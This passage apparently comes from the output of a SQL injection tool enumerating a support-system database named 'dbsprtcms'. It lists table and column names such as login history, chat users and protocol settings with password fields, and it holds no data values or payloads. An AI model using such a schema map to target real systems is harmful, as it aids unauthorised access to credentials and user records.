| job_time_bias | int |
| job_time_formatted | datetime |
| job_timestamp | nvarchar |
| job_version | int |
| user_guid | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sym_iso_mapping
[2 columns]
+---------------+------+
| Column | Type |
+---------------+------+
| iso_lang_code | char |
| sym_lang_code | char |
+---------------+------+
Database: dbsprtcms
Table: dbo.sprt_db_version
[42 columns]
+--------------------------------+----------+
| Column | Type |
+--------------------------------+----------+
| comments | nvarchar |
| dbbuild | varchar |
| dotasp | varchar |
| dtalkback_constraints | int |
| dtalkback_functions | int |
| dtalkback_indexes | int |
| dtalkback_materialized_objects | int |
| dtalkback_procedures | int |
| dtalkback_sequences | int |
| dtalkback_tables | int |
| dtalkback_triggers | int |
| dtalkback_views | int |
| dtalkbackt_packages | int |
| insert_row_type | int |
| last_modified | datetime |
| sqlbv | varchar |
| support_constraints | int |
| support_functions | int |
| support_indexes | int |
| support_materialized_objects | int |
| support_packages | int |
| support_procedures | int |
| support_sequences | int |
| support_tables | int |
| support_triggers | int |
| support_views | int |
| talkback_constraints | int |
| talkback_functions | int |
| talkback_indexes | int |
| talkback_materialized_objects | int |
| talkback_packages | int |
| talkback_procedures | int |
| talkback_sequences | int |
| talkback_tables | int |
| talkback_triggers | int |
| talkback_views | int |
| version | nvarchar |
| version_guid | char |
| version_id | int |
| version_row_guid | char |
| version_table_name | varchar |
| version_tb_row_count | int |
+--------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_diag_group
[6 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| svdg_display_order | int |
| svdg_geography_guid | char |
| svdg_group_id | int |
| svdg_group_name | nvarchar |
| svdg_row_guid | char |
| svdg_type | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_activity_log
[7 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| spal_bulletin_id | nvarchar |
| spal_char_result | nvarchar |
| spal_client_guid | char |
| spal_patch_name | nvarchar |
| spal_qnumber | nvarchar |
| spal_result | int |
| spal_timestamp | datetime |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_scripts
[12 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| descriptions | nvarchar |
| script_engine | nvarchar |
| script_filter_language | nvarchar |
| script_group | int |
| script_group_guid | char |
| script_guid | char |
| script_id | int |
| script_length | int |
| script_ltext | ntext |
| script_name | nvarchar |
| script_single_name | nvarchar |
| script_text | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_InfraredDevice
[6 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pManufacturer | nvarchar |
| pName | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_email_outbox_history
[17 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| comments | nvarchar |
| email_outbox_guid | char |
| email_type | int |
| mail_attachment | nvarchar |
| mail_bcc | nvarchar |
| mail_body | ntext |
| mail_cc | nvarchar |
| mail_from | nvarchar |
| mail_subject | nvarchar |
| mail_to | nvarchar |
| received_list | nvarchar |
| send_date | datetime |
| send_through | nvarchar |
| status | int |
| template_guid | char |
| template_priority | int |
| visible | int |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_login_history
[4 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| logintime | datetime |
| logouttime | datetime |
| user_id | int |
| user_name | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.sprt_snapins_container
[6 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| descriptions | nvarchar |
| display_name | nvarchar |
| display_order | int |
| site_location | nvarchar |
| snapcntr_row_guid | char |
| user_type | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sym_sc_usage
[15 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| scus_admin_weight | int |
| scus_comment | nvarchar |
| scus_content_guid | char |
| scus_content_version | int |
| scus_data | nvarchar |
| scus_position | int |
| scus_principal | nvarchar |
| scus_rating | int |
| scus_result | int |
| scus_row_guid | char |
| scus_session | char |
| scus_solved | int |
| scus_timestamp | datetime |
| scus_verb | nchar |
| scus_view | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_status
[3 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| scst_display | nvarchar |
| scst_row_guid | char |
| scst_status | nchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_services
[8 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| svs_csr_xml | nvarchar |
| svs_data_provider | nvarchar |
| svs_dispatcher_xml | nvarchar |
| svs_display_name | nvarchar |
| svs_escalate_path | nvarchar |
| svs_report_guid | char |
| svs_row_guid | char |
| svs_type | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_informlog
[16 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| nc_il_boot | int |
| nc_il_bootstrap | int |
| nc_il_command_key | nvarchar |
| nc_il_comp_diag | int |
| nc_il_conn_req | int |
| nc_il_inform_guid | char |
| nc_il_initiator | int |
| nc_il_kicked | int |
| nc_il_oui_event | nvarchar |
| nc_il_periodic | int |
| nc_il_rpc_name | nvarchar |
| nc_il_schedule | int |
| nc_il_time | datetime |
| nc_il_transaction_guid | char |
| nc_il_valuechanged | int |
| nc_il_xfer_comp | int |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_workorder_properties
[7 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| svwp_key | nvarchar |
| svwp_type | varchar |
| svwp_valdate | datetime |
| svwp_valfloat | float |
| svwp_valint | int |
| svwp_valstring | nvarchar |
| svwp_workorder | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_type_def
[10 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| scctd_attributes | int |
| scctd_content_type_guid | char |
| scctd_displayname | nvarchar |
| scctd_field_name | nvarchar |
| scctd_field_size | int |
| scctd_field_type | nchar |
| scctd_field_value | nvarchar |
| scctd_index | int |
| scctd_row_guid | char |
| scctd_sort_order | int |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_usage_archive
[15 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| scus_admin_weight | int |
| scus_comment | nvarchar |
| scus_content_guid | char |
| scus_content_version | int |
| scus_data | nvarchar |
| scus_position | int |
| scus_principal | nvarchar |
| scus_rating | int |
| scus_result | int |
| scus_row_guid | char |
| scus_session | char |
| scus_solved | int |
| scus_timestamp | datetime |
| scus_verb | nchar |
| scus_view | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_push_links
[7 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| p_lnk_createtime | datetime |
| p_lnk_folder_path | nvarchar |
| p_lnk_guid | char |
| p_lnk_link | nvarchar |
| p_lnk_name | nvarchar |
| p_lnk_type | int |
| p_lnk_user_guid | char |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_Software
[6 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| elementNum | int |
| incidentID | char |
| pid | nvarchar |
| pSMA_Software_Binding | nvarchar |
| pstatus | nvarchar |
| ptitle | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_tool_session
[9 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| tses_analyst_name | nvarchar |
| tses_end | datetime |
| tses_id | char |
| tses_machine | nvarchar |
| tses_origin | nvarchar |
| tses_siid | char |
| tses_start | datetime |
| tses_type | nvarchar |
| tses_user | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_plan
[23 columns]
+------------------------------+----------+
| Column | Type |
+------------------------------+----------+
| nc_plan_actions | nvarchar |
| nc_plan_admin_guid | char |
| nc_plan_email | nvarchar |
| nc_plan_expiry_time | datetime |
| nc_plan_fail_threshold | nvarchar |
| nc_plan_filtercriteria | nvarchar |
| nc_plan_filtertype | nvarchar |
| nc_plan_guid | char |
| nc_plan_name | nvarchar |
| nc_plan_next_start_time | datetime |
| nc_plan_orig_expiry_time | datetime |
| nc_plan_orig_start_time | datetime |
| nc_plan_repeat_count | int |
| nc_plan_repeat_number | int |
| nc_plan_repeat_type | int |
| nc_plan_repeatcycle | nvarchar |
| nc_plan_server_type | nvarchar |
| nc_plan_start_time | datetime |
| nc_plan_status | int |
| nc_plan_trial_device_pass | int |
| nc_plan_trial_device_success | int |
| nc_plan_trialdevices | nvarchar |
| nc_plan_xml | image |
+------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_kernel_ext
[25 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| sike_date_1 | datetime |
| sike_date_2 | datetime |
| sike_date_3 | datetime |
| sike_date_4 | datetime |
| sike_date_5 | datetime |
| sike_image | image |
| sike_int_1 | int |
| sike_int_2 | int |
| sike_int_3 | int |
| sike_iss_guid | char |
| sike_nvarchar_1 | nvarchar |
| sike_nvarchar_10 | nvarchar |
| sike_nvarchar_11 | nvarchar |
| sike_nvarchar_12 | nvarchar |
| sike_nvarchar_13 | nvarchar |
| sike_nvarchar_14 | nvarchar |
| sike_nvarchar_15 | nvarchar |
| sike_nvarchar_2 | nvarchar |
| sike_nvarchar_3 | nvarchar |
| sike_nvarchar_4 | nvarchar |
| sike_nvarchar_5 | nvarchar |
| sike_nvarchar_6 | nvarchar |
| sike_nvarchar_7 | nvarchar |
| sike_nvarchar_8 | nvarchar |
| sike_nvarchar_9 | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_products
[4 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| spp_prod_guid | char |
| spp_prod_id | int |
| spp_prod_name | nvarchar |
| spp_spid_latest | char |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.Win32_LogicalMemoryConfig
[4 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| elementNum | int |
| incidentID | char |
| pName | nvarchar |
| pTotalPhysicalMemory | decimal |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_script_content_map
[5 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| category_guid | char |
| content_guid | char |
| content_type | nvarchar |
| script_guid | char |
| script_id | int |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_geographies
[5 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| svg_geography_guid | char |
| svg_left | int |
| svg_level_guid | char |
| svg_name | nvarchar |
| svg_right | int |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.PCH_UploadData
[22 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pAdditionalFiles_Number | nvarchar |
| pArea | nvarchar |
| pBetaID | nvarchar |
| pBRP_Version | nvarchar |
| pCollectOK | nvarchar |
| pDCStatus | nvarchar |
| pExpectedBehavior | ntext |
| pMachineID | nvarchar |
| pOSBuildNumber | nvarchar |
| pOSLanguage | nvarchar |
| pOSSysACP | nvarchar |
| pOSUserLocalLCID | nvarchar |
| pPROBLEMDESCRIPTION | ntext |
| pPRODUCTID | nvarchar |
| pPRODUCTNAME | nvarchar |
| pReproducibility | nvarchar |
| pSeverity | nvarchar |
| pStepsToRepro | ntext |
| pTitle | nvarchar |
| pUSERNAME | nvarchar |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Sys_Cust
[38 columns]
+----------------------------+----------+
| Column | Type |
+----------------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pAssetNumber | nvarchar |
| pAssetRefSI | nvarchar |
| pBeyondMail | nvarchar |
| pBeyondMailMailServerName | nvarchar |
| pBeyondMailUserName | nvarchar |
| pClientPhone | nvarchar |
| pClientSignature | nvarchar |
| pContainer | nvarchar |
| pDataBackupRequired | nvarchar |
| pDatePre_FieldApproved | nvarchar |
| pDatePre_FieldCompleted | nvarchar |
| pDesiredSubnet | nvarchar |
| pDesktop | nvarchar |
| pEthernetDrop | nvarchar |
| pExtDevices_1 | nvarchar |
| pExtDevices_2 | nvarchar |
| pGroupwise | nvarchar |
| pGroupwiseMailServerName | nvarchar |
| pGroupwiseUserName | nvarchar |
| pJackNumber | nvarchar |
| pLaptop | nvarchar |
| pMainframeAccess | nvarchar |
| pMake_Model | nvarchar |
| pMidrangeAccess | nvarchar |
| pMonitorSize | nvarchar |
| pNICType | nvarchar |
| pOutlook | nvarchar |
| pOutlookMailServerName | nvarchar |
| pOutlookUserName | nvarchar |
| pPre_FieldTechnicianName | nvarchar |
| pPre_FieldTechnicianPhone | nvarchar |
| pRetain_1 | nvarchar |
| pRetain_2 | nvarchar |
| pSDCAsset_Sys_Cust_Binding | nvarchar |
| pTreeContext | nvarchar |
| pUsedRamSlots | nvarchar |
+----------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_dna_master
[23 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| tgalwaystrigopt | nvarchar |
| tgcategory | nvarchar |
| tgcheck | nvarchar |
| tgdisplay | nvarchar |
| tgdna_guid | nvarchar |
| tgdnacount | nvarchar |
| tgerrormsgtrigopt | nvarchar |
| tgexceptiontrigopt | nvarchar |
| tgfirsttimetrigopt | nvarchar |
| tgheal | nvarchar |
| tghotkey | nvarchar |
| tghotkeytrigopt | nvarchar |
| tglocalvault | nvarchar |
| tgmode | nvarchar |
| tgnthtime | nvarchar |
| tgnthtimetrigopt | nvarchar |
| tgowner | nvarchar |
| tgpath | nvarchar |
| tgpreviewurl | nvarchar |
| tgsearchurl | nvarchar |
| tgstatus | nvarchar |
| tgtriggertype | nvarchar |
| tgtype | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sweeper_machines
[10 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| ssm_end | datetime |
| ssm_guid | char |
| ssm_machine_name | nvarchar |
| ssm_src_machine | nvarchar |
| ssm_src_user | nvarchar |
| ssm_start | datetime |
| ssm_std_out | nvarchar |
| ssm_sweep_name | nvarchar |
| ssm_sweep_status | nvarchar |
| ssm_sweep_status_code | int |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_AdapterInfo
[10 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| elementNum | int |
| incidentID | char |
| padaptercode | nvarchar |
| padapters_present | nvarchar |
| pdetectpage_hits | nvarchar |
| pinstalllaptopdrivers | nvarchar |
| pinstallusbdrivers | nvarchar |
| plaptopreboot | nvarchar |
| pSMA_AdapterInfo_Binding | nvarchar |
| pusbreboot | nvarchar |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sasv_overrides
[9 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| svo_comments | nvarchar |
| svo_completion_id | nvarchar |
| svo_device_id | nvarchar |
| svo_override_auth | nvarchar |
| svo_reason | nvarchar |
| svo_tech_id | nvarchar |
| svo_trans_date | datetime |
| svo_transaction_guid | char |
| svo_workorder | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_VideoController
[11 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pAdapterCompatibility | nvarchar |
| pAdapterDACType | nvarchar |
| pAdapterRAM | int |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pDriverDate | nvarchar |
| pDriverVersion | nvarchar |
| pName | nvarchar |
| pVideoProcessor | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_srclog_archive
[10 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| sss_action | char |
| sss_comment | nvarchar |
| sss_content_guid | char |
| sss_content_version | int |
| sss_date | datetime |
| sss_rating | int |
| sss_row_guid | char |
| sss_session | char |
| sss_solved | int |
| sss_src_value | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_trigger_filters
[6 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| stf_desc | nvarchar |
| stf_guid | char |
| stf_name | nvarchar |
| stf_order | int |
| stf_queue | nvarchar |
| stf_type | nvarchar |
+-----------+----------+
Database: dbsprtcms
Table: dbo.sprt_user_brands
[5 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| app_name | nvarchar |
| brand_description | nvarchar |
| brand_guid | char |
| brand_name | nvarchar |
| brand_target | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_upload
[10 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| scul_field_name | nvarchar |
| scul_file_data | image |
| scul_file_name | nvarchar |
| scul_file_size | int |
| scul_file_type | nvarchar |
| scul_guid | char |
| scul_row_guid | char |
| scul_session | char |
| scul_timestamp | datetime |
| scul_user | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_report
[8 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| sr_attributes | int |
| sr_guid | char |
| sr_lastmod | datetime |
| sr_name | nvarchar |
| sr_order | int |
| sr_path | nvarchar |
| sr_version | varchar |
| sr_xml | ntext |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cts_field_mappings
[16 columns]
+----------------------------+----------+
| Column | Type |
+----------------------------+----------+
| cfm_cts_ticket_field | nvarchar |
| cfm_cts_ticket_field_label | nvarchar |
| cfm_cts_ticket_form | nvarchar |
| cfm_field_attributes | int |
| cfm_field_default | nvarchar |
| cfm_field_length | int |
| cfm_integration_id | nvarchar |
| cfm_map_cts_rqa | nvarchar |
| cfm_map_rqa_cts | nvarchar |
| cfm_mapping_type | nvarchar |
| cfm_modified_on | datetime |
| cfm_row_guid | char |
| cfm_script | ntext |
| cfm_sprt_issue_class | nvarchar |
| cfm_sprt_issue_property | nvarchar |
| cfm_sprt_request_type | nvarchar |
+----------------------------+----------+
Database: dbsprtcms
Table: dbo.Mail_Categories
[4 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| elementNum | int |
| incidentID | char |
| pKeyName | nvarchar |
| pSubKeyName | nvarchar |
+-------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_usage_stats
[11 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| scs_admin_weight | int |
| scs_avg_rating | float |
| scs_avg_solved | float |
| scs_content_guid | char |
| scs_content_version | int |
| scs_halflife | float |
| scs_n_queried | int |
| scs_n_rating | int |
| scs_n_solved | int |
| scs_n_view | int |
| scs_timestamp | datetime |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_serviceclass_config
[4 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| nc_scc_classname | nvarchar |
| nc_scc_guid | char |
| nc_scc_paramname | nvarchar |
| nc_scc_paramvalue | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_author_sub_module
[4 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| mod_guid | char |
| scc_row_guid | char |
| sub_mod_guid | char |
| sub_mod_name | nvarchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_BIOS
[13 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pManufacturer | nvarchar |
| pName | nvarchar |
| pReleaseDate | nvarchar |
| pSerialNumber | nvarchar |
| pSMBIOSMajorVersion | int |
| pSMBIOSMinorVersion | int |
| pSMBIOSPresent | int |
| pSoftwareElementID | nvarchar |
| pSoftwareElementState | int |
| pTargetOperatingSystem | int |
| pVersion | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_verbs
[4 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| siv_verb_desc | nvarchar |
| siv_verb_guid | char |
| siv_verb_name | nvarchar |
| siv_verb_type | int |
+---------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_USBController
[6 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pManufacturer | nvarchar |
| pName | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_snapins
[15 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| descriptions | nvarchar |
| frame | nvarchar |
| keywords | nvarchar |
| link_display | nvarchar |
| name | nvarchar |
| noref | nchar |
| site_location | nvarchar |
| snapin_guid | char |
| snapin_id | int |
| snapin_url | nvarchar |
| snapinorder | int |
| treepath | nvarchar |
| user_type | nvarchar |
| version | nvarchar |
| visible | int |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sma_protocol_post
[6 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| smap_auth_type | nvarchar |
| smap_cmd_guid | char |
| smap_domain | nvarchar |
| smap_password | nvarchar |
| smap_post_url | nvarchar |
| smap_username | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_log
[7 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| svl_end_date | datetime |
| svl_event | nvarchar |
| svl_msg_level | int |
| svl_service_type | nvarchar |
| svl_session_guid | char |
| svl_start_date | datetime |
| svl_workorder | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_systune_pagevisits
[5 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| stpv_end | datetime |
| stpv_pagename | nvarchar |
| stpv_row_guid | char |
| stpv_session_guid | char |
| stpv_start | datetime |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.ObjectInstances
[7 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| creationDate | datetime |
| modificationDate | datetime |
| objectDoubleName | nvarchar |
| objectID | nchar |
| objectName | nvarchar |
| objectType | int |
| owningObjectID | nchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_update_manifest
[8 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| update_change_time | datetime |
| update_data | nvarchar |
| update_description | nvarchar |
| update_guid | char |
| update_id | int |
| update_opts | nvarchar |
| update_source | nvarchar |
| update_target | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_plan_attributes
[16 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| nc_pattr_alias | nvarchar |
| nc_pattr_catalog_guid | char |
| nc_pattr_catalogtype | nvarchar |
| nc_pattr_completeindex | int |
| nc_pattr_dependency | nvarchar |
| nc_pattr_eventindex | int |
| nc_pattr_failindex | int |
| nc_pattr_filtercriteria | nvarchar |
| nc_pattr_guid | char |
| nc_pattr_index | int |
| nc_pattr_max_concurrent | int |
| nc_pattr_parentindex | int |
| nc_pattr_plan_guid | char |
| nc_pattr_request | image |
| nc_pattr_rpc_type | int |
| nc_pattr_succindex | int |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_meter_application_data
[10 columns]
+------------------------------+----------+
| Column | Type |
+------------------------------+----------+
| admd_application_action | nvarchar |
| admd_application_client_guid | char |
| admd_application_name | nvarchar |
| admd_application_version | nvarchar |
| admd_domain | nvarchar |
| admd_machine_name | nvarchar |
| admd_macid | nvarchar |
| admd_tcpip_address | nvarchar |
| admd_timestamp | datetime |
| admd_user_name | nvarchar |
+------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_type_verbs
[3 columns]
+---------------------+------+
| Column | Type |
+---------------------+------+
| sitv_type_guid | char |
| sitv_type_verb_guid | char |
| sitv_verb_guid | char |
+---------------------+------+
Database: dbsprtcms
Table: dbo.old_sprt_systune_interactive_usage
[7 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| stiu_after | nvarchar |
| stiu_before | nvarchar |
| stiu_content_guid | char |
| stiu_content_version | int |
| stiu_related_name | nvarchar |
| stiu_row_guid | char |
| stiu_session_guid | char |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_wf_schemedefs
[4 columns]
+--------------------+------+
| Column | Type |
+--------------------+------+
| scwfsd_group_id | char |
| scwfsd_group_order | int |
| scwfsd_row_guid | char |
| scwfsd_scheme_id | char |
+--------------------+------+
Database: dbsprtcms
Table: dbo.sprt_report_save
[7 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| srs_comment | nvarchar |
| srs_date | datetime |
| srs_report_guid | char |
| srs_row_guid | char |
| srs_temporary | int |
| srs_user_guid | nvarchar |
| srs_xml | ntext |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_translation_status
[3 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| sct_row_guid | char |
| sct_status_code | nchar |
| sct_status_name | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_profiles
[5 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| data | nvarchar |
| descriptions | nvarchar |
| name | nvarchar |
| profile_guid | char |
| profile_id | int |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_contrib_env
[12 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| scce_attrib | int |
| scce_audience | nchar |
| scce_content_guid | char |
| scce_env_ntext | ntext |
| scce_env_nvarchar1 | nvarchar |
| scce_env_nvarchar2 | nvarchar |
| scce_env_nvarchar3 | nvarchar |
| scce_env_nvarchar4 | nvarchar |
| scce_ext_incidence | nvarchar |
| scce_ext_incidence_id | nvarchar |
| scce_session | char |
| scce_version | int |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_friendly_id_time
[3 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| id | int |
| time_stamp | datetime |
| time_stamp_name | varchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_tabcolinfo
[3 columns]
+------------------+-------+
| Column | Type |
+------------------+-------+
| sitclin_col_guid | char |
| sitclin_col_xml | ntext |
| sitclin_tab_guid | char |
+------------------+-------+
Database: dbsprtcms
Table: dbo.sprt_group_user
[6 columns]
+-----------------+------+
| Column | Type |
+-----------------+------+
| group_guid | char |
| group_id | int |
| group_user_guid | char |
| gu_default | int |
| user_guid | char |
| user_id | int |
+-----------------+------+
Database: dbsprtcms
Table: dbo.sprt_chat_users
[20 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| assigned_date | datetime |
| closed_date | datetime |
| cmd | varchar |
| created_date | datetime |
| email_addr | nvarchar |
| esc_in | int |
| esc_out | int |
| fixed | int |
| id | int |
| ident | varchar |
| last_modified | datetime |
| problem | nvarchar |
| queue | nvarchar |
| rc | varchar |
| room | varchar |
| si | varchar |
| status | varchar |
| typing | varchar |
| user_name | nvarchar |
| user_type | varchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_class_prop
[5 columns]
+-------------------------+------+
| Column | Type |
+-------------------------+------+
| adcp_class_id | char |
| adcp_class_prop_display | char |
| adcp_class_prop_id | char |
| adcp_class_prop_name | char |
| adcp_class_prop_type | char |
+-------------------------+------+
Database: dbsprtcms
Table: dbo.SDCAsset_Keyboard
[5 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pName | nvarchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_queue
[11 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| siq_act_guid | char |
| siq_csr_guid | char |
| siq_csr_name | nvarchar |
| siq_iss_guid | char |
| siq_que_guid | char |
| siq_ses_id | int |
| siq_state | int |
| siq_t_act_finished | datetime |
| siq_t_act_started | datetime |
| siq_t_csr_assigned | datetime |
| siq_t_que_queued | datetime |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ra_users
[9 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| client_guid | nvarchar |
| descriptions | nvarchar |
| session_id | nvarchar |
| time_in | datetime |
| time_picked_up | datetime |
| user_address | nvarchar |
| user_email | nvarchar |
| user_name | nvarchar |
| user_os | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sma_protocol_socket
[3 columns]
+---------------+---------+
| Column | Type |
+---------------+---------+
| smas_cmd_guid | char |
| smas_ip | varchar |
| smas_port | int |
+---------------+---------+
Database: dbsprtcms
Table: dbo.sprt_upload_manifest
[8 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| upload_change_time | datetime |
| upload_data | nvarchar |
| upload_description | nvarchar |
| upload_guid | char |
| upload_id | int |
| upload_opts | nvarchar |
| upload_source | nvarchar |
| upload_target | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.SDC_WebHarvest
[43 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| elementNum | int |
| incidentID | char |
| pSDC_WebHarvest_Binding | nvarchar |
| pSE_dbsession | nvarchar |
| pSE_lcid | nvarchar |
| pSE_sprt_audience | nvarchar |
| pSE_sprt_uinfo_inserted | nvarchar |
| pSE_ssbrandcached | nvarchar |
| pSE_ssbrandid | nvarchar |
| pSE_ssdbtz | nvarchar |
| pSE_ssgids | nvarchar |
| pSE_ssgnames | nvarchar |
| pSE_ssid | nvarchar |
| pSE_ssuser | nvarchar |
| pSE_ssUserTz | nvarchar |
| pSE_tzoffset | nvarchar |
| pSV_APPL_MD_PATH | nvarchar |
| pSV_APPL_PHYSICAL_PATH | nvarchar |
| pSV_CONTENT_LENGTH | nvarchar |
| pSV_GATEWAY_INTERFACE | nvarchar |
| pSV_HTTP_ACCEPT | nvarchar |
| pSV_HTTP_ACCEPT_ENCODING | nvarchar |
